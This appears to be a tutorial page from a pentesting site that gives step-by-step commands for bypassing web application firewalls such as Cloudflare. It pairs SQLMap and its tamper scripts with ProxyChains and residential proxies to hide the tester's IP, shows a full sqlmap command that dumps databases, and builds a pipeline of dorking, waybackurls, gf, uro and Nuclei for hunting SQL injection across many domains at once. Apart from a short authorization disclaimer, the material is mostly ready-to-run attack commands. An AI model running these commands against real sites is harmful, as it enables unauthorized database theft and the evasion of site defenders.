WAF Bypass & PoCs

WAF Bypass with SQLMap

Bypass WAFs using SQLMap + ProxyChains + tamper scripts

9 Steps
22 Commands

Table of Contents

1What is a WAF?2Setup Requirements3Configuring ProxyChains4Validating ProxyChains with Curl5SQLMap + ProxyChains + Tamper Scripts6Mass Hunting SQLi7Reducing Noise for Effective Scanning8Scanning with Nuclei SQLi Templates9Conclusion

A Web Application Firewall monitors and filters HTTP traffic to protect applications by blocking malicious payloads like SQL injection, XSS and more.

Tools & Resources

Cloudflare

Popular CDN + WAF provider

ModSecurity

Open-source WAF engine

AWS WAF

Amazon Web Services WAF

Imperva

Enterprise WAF solution

Commands & Payloads

1Feature: Request filtering
Request filtering - inspect and block malicious requests
2Feature: Geo-blocking
Geo-blocking - restrict traffic by region
3Feature: Rate limiting
Rate limiting - prevent brute force and DDoS
4Feature: Custom rules
Custom rule creation - tailor rules for your app

Pro Tips

  • WAFs use signature-based and behavioral detection
  • Each WAF has different bypass methods
  • Always test with authorization first

Before we begin, we need: SQLMap for automating SQL injections, ProxyChains for routing through proxies, and Residential Proxies to mimic real users.

Commands & Payloads

1Required: SQLMap
SQLMap - powerhouse for automating SQL injections
2Required: ProxyChains
ProxyChains - routes traffic through multiple proxies
3Required: Residential Proxies
Residential Proxies - mimic real users to avoid detection

Pro Tips

  • Install SQLMap: git clone https://github.com/sqlmapproject/sqlmap
  • ProxyChains comes pre-installed on most pentest distros
  • Residential proxies are more effective than datacenter proxies

Open the ProxyChains config file, disable local proxy, add residential proxies, and enable random chain for reliability.

Commands & Payloads

1Open ProxyChains config file
sudo mousepad /etc/proxychains.conf
2Disable default Tor proxy
Comment out: # socks4 127.0.0.1 9050
3Add residential proxies
Add proxies: http <ip> <port> [user] [pass]
4Disable dynamic chain
Disable: #dynamic_chain
5Enable random chain for reliability
Enable: random_chain
6Quiet mode - no library output
Add: quiet_mode

Pro Tips

  • Random chain improves reliability with multiple proxies
  • Each connection uses a random proxy from the list
  • Test with a small proxy list first to verify config

After configuration, run curl through ProxyChains to verify everything is working correctly.

Commands & Payloads

1Check proxy chain is working
proxychains curl http://ipinfo.io
2Verify IP is masked
proxychains curl http://ipinfo.io/ip

Pro Tips

  • The IP shown should be from your proxy list, not your real IP
  • If connection fails, check proxy format in config file
  • Test multiple times to verify random chain is working

Use SQLMap with ProxyChains and tamper scripts to bypass Cloudflare WAF and dump databases.

Commands & Payloads

1SQLMap WAF bypass with ProxyChains and tampers
proxychains sqlmap -u 'url' --dbs --batch -p id --random-agent --tamper=between,space2comment --dbms mysql --tech=B --no-cast --flush-session --threads 10

Pro Tips

  • Tamper scripts: between, space2comment help bypass WAF rules
  • --random-agent changes User-Agent per request
  • --tech=B limits to boolean-based blind injection (quieter)
  • --no-cast avoids CAST expressions (detected by some WAFs)

Scale the process by hunting SQL injection across similar subdomains using Google Dorks and passive sources.

Tools & Resources

Dorking Script

Google dorking script for subdomain discovery

waybackurls

Fetch URLs from Wayback Machine

gf (grep patterns)

Pattern matching for common vulnerabilities

uro

Remove duplicate URLs

Commands & Payloads

1Dorking script for finding subdomains
https://github.com/coffinxp/scripts/blob/main/dorking.py
2Extract domain names from URLs
cat urls.txt | awk -F/ '{print $3}' | sort -u
3Get SQL param URLs from passive sources
cat urls.txt | waybackurls | gf sqli | uro > new.txt

Pro Tips

  • Use Google Dorks to find similar subdomains first
  • waybackurls fetches historical URLs from Archive.org
  • gf sqli filters URLs with SQL injection parameters

Reduce noise by getting one SQL param URL per domain to efficiently scan across a wide range of assets.

Commands & Payloads

1One SQL param URL per domain
cat urls.txt | gawk -F/ '{host=$3; sub(/:80$/, "", host); if (!(host in seen)) { print $0; seen[host] } }'

Pro Tips

  • Testing all URLs at once is inefficient
  • This regex gives one unique URL per domain
  • Great for quickly identifying vulnerable targets

Fire up Nuclei with DAST SQLi templates to scan for SQL injection vulnerabilities.

Tools & Resources

Nuclei DAST SQLi Template

DAST SQL injection detection template

Error SQLi Template

Error-based SQLi detection

Commands & Payloads

1Nuclei scan with DAST SQLi template
nuclei -l urls.txt -t nuclei-templates/dast/sql-injection.yaml
2Error-based SQLi Nuclei template
https://github.com/coffinxp/nuclei-templates/blob/main/errsqli.yaml

Pro Tips

  • Nuclei can scan thousands of URLs quickly
  • DAST templates detect active vulnerabilities
  • Combine with gf and uro for cleaner results

ProxyChains and SQLMap make a powerful combo for bypassing WAFs. With residential proxies and tamper scripts, you can bypass Cloudflare, ModSecurity, and more.

Pro Tips

  • ProxyChains + residential proxies + SQLMap tampers = WAF bypass
  • Scale testing with Google Dorks + waybackurls + gf + uro
  • Use Nuclei DAST templates for mass scanning
  • Focus on finding real issues, not false alarms

For educational and authorized testing purposes only.